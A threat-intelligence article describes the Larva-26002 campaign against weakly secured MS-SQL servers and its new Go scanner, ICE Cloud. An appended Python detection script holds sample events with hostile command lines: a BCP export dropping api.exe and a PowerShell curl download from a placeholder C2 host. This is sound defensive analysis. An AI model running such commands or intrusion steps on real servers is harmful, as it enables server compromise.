A persistent threat actor, identified as Larva-26002, has been continuously targeting poorly managed Microsoft SQL (MS-SQL) servers, now deploying a new scanner malware named ICE Cloud Client. This campaign, active since at least January 2024 and extending into 2026, showcases the attacker’s evolving toolset, shifting from ransomware operations to large-scale scanning of vulnerable database infrastructure.
Initially, in January 2024, the group gained notoriety for deploying Trigona and Mimic ransomware on internet-exposed MS-SQL servers with weak credentials. They notably exploited the Bulk Copy Program (BCP) utility, a legitimate MS-SQL tool, to extract and drop malware onto compromised hosts. Remote access was facilitated through tools like AnyDesk, along with port forwarders for RDP connections. By 2025, the threat actor had incorporated Teramind, a remote monitoring and management (RMM) tool, and transitioned to a scanner written in Rust.
Recent findings from ASEC analysts in 2026 reveal a new offensive by the same threat actor, compromising MS-SQL servers previously targeted in earlier years. This latest wave involves the deployment of ICE Cloud, a scanner malware developed in the Go programming language, marking a departure from the Rust-based scanner used previously. Evidence linking this campaign to earlier Mimic ransomware attacks comes from encoded Turkish binary strings within ICE Cloud. This pattern of repeated targeting underscores a deliberate, long-term strategy focused on unpatched database servers.
What elevates the concern surrounding this campaign is the strategic shift from ransomware to scanning. By accumulating a growing network of compromised servers that silently probe other databases for weak credentials, the threat actor appears to be laying the groundwork for more significant future operations. The data collected is then exfiltrated to the attacker’s command-and-control (C&C) server, providing the group with a comprehensive overview of exposed database assets across the internet.
ICE Cloud Scanner: The Infection Mechanism
The infiltration process begins when Larva-26002 identifies an MS-SQL server accessible online with inadequate password security. Upon gaining access, typically through brute force or dictionary attacks, the attacker executes system commands such as hostname, whoami, and netstat -an to gather information about the targeted host. The malware is then dropped to disk using the BCP utility: a malicious binary stored in the database table uGnzBdZbsi is exported to a local directory as api.exe, guided by a format file named FODsOZKgAU.txt. This specific method of malware deployment has remained consistent since 2024.
In instances where the BCP utility is unsuccessful, the malware is downloaded using Curl or Bitsadmin via PowerShell. This alternative method ensures the delivery of the malicious payload even when the primary method faces obstructions.
The file labeled ICE Cloud Launcher, or api.exe, establishes a connection to a C&C server for authentication before proceeding to download the core scanning component, known as ICE Cloud Client. Once acquired, ICE Cloud Client is saved under a randomly generated filename, an obfuscation technique intended to make it appear as a legitimate program.
Following its installation, the malware registers itself with the C&C server. This server then provides the scanner with a list of MS-SQL addresses to target, along with a credential pair, often exemplified by ecomm/ecomm, and a task string like TASK. The scanner then attempts to log in using these provided credentials and reports any successful access attempts back to the C&C server.
Internal binary strings within the malware are written in Turkish and incorporate emoji characters, suggesting the potential utilization of generative AI tools by the developer in crafting certain code segments. This detail offers a subtle clue into the development process and the potential background of the threat actor.
To mitigate these risks, database administrators are strongly advised to implement robust, complex passwords for all MS-SQL accounts and to update them regularly. Any MS-SQL server exposed to the internet must be shielded by a firewall that strictly permits only authorized incoming connections. Maintaining up-to-date endpoint security software is also crucial, as it helps in detecting and blocking known malware before it can execute on a host system.
Administrators should remain vigilant for any unusual BCP activity, the presence of unexpected files such as api.exe in the C:\ProgramData directory, or unauthorized outbound network connections. Any such indicators should be treated as potential compromise incidents requiring immediate and thorough investigation.
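As an added illustration of the detection guidance above (this code is not from the article or from ASEC), the following Python triage rule flags process-creation records that match the playbook described here: recon commands, BCP exports and curl/bitsadmin downloads spawned by SQL Server, and executables dropped under C:\ProgramData. The record layout, the sample paths and the C2 host name are assumptions constructed for the example.

```python
import re

# Post-login recon commands and fallback downloaders named in the article
RECON = {"hostname", "whoami", "netstat"}
DOWNLOADERS = {"curl", "bitsadmin"}
# Constructed record layout: parent=<path> image=<path> cmd=<command line>
EVENT_RE = re.compile(r"parent=(\S+)\s+image=(\S+)\s+cmd=(.*)")
DROP_RE = re.compile(r"c:\\programdata\\[^\\\s\"]+\.exe")

def parse_event(line):
    """Parse one constructed record into a dict; None if it does not match."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    return {"parent": m.group(1).lower(), "image": m.group(2).lower(),
            "cmd": m.group(3).lower()}

def classify(ev):
    """Return the article's indicators that this event matches."""
    reasons = []
    exe = ev["image"].rsplit("\\", 1)[-1]
    tokens = set(re.findall(r"[a-z]+", ev["cmd"]))
    from_sql = ev["parent"].endswith("sqlservr.exe")  # xp_cmdshell-style child
    if from_sql and exe == "bcp.exe" and tokens & {"out", "queryout"}:
        reasons.append("bcp export spawned by SQL Server (table-to-file drop)")
    if from_sql and tokens & DOWNLOADERS:
        reasons.append("download utility launched from SQL Server")
    if from_sql and tokens & RECON:
        reasons.append("host recon command from SQL Server")
    if DROP_RE.search(ev["cmd"]):
        reasons.append("executable written under C:\\ProgramData")
    return reasons

def scan(lines):
    """Return [(line, reasons)] for every record matching at least one indicator."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = classify(ev) if ev else []
        if reasons:
            hits.append((line, reasons))
    return hits

SQL = r"C:\MSSQL\Binn\sqlservr.exe"  # assumed install path
SAMPLE = [  # constructed events, not real telemetry; C2-PLACEHOLDER stands in for the C&C host
    r"parent=C:\Windows\explorer.exe image=C:\Windows\System32\cmd.exe cmd=cmd /c dir",
    rf"parent={SQL} image=C:\Windows\System32\cmd.exe cmd=cmd /c whoami",
    rf"parent={SQL} image=C:\Tools\bcp.exe cmd=bcp db.dbo.uGnzBdZbsi out C:\ProgramData\api.exe -f FODsOZKgAU.txt -T",
    rf"parent={SQL} image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell -c curl http://C2-PLACEHOLDER/api.exe -o C:\ProgramData\api.exe",
]

if __name__ == "__main__":
    for line, reasons in scan(SAMPLE):
        print(reasons, "<-", line[:70])
```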